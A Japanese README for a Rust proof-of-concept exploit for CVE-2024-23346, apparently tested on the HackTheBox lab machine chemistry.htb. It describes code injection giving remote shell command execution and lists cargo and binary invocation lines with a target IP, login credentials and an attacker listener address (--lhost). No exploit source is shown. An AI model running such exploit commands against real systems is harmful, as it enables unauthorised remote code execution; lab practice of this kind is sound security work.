
CVE-2024-23346向けのRust製エクスプロイトで、「端末」として機能します(chemistry.htbでテスト済み)
CVE-2024-23346 用の Rust 製エクスプロイトスクリプト。
以下に示すように、POC はコードインジェクションの脆弱性を利用し、ターミナルのようにリモートシェルコマンドを実行します。
エクスプロイトの実行手順:
Cargo で直接実行
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19または
cargo build -r (バイナリは target/release/poc に生成されます)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19エクスプロイトスクリプトは Python Scripting Expert MAWK0235 から着想を得ています。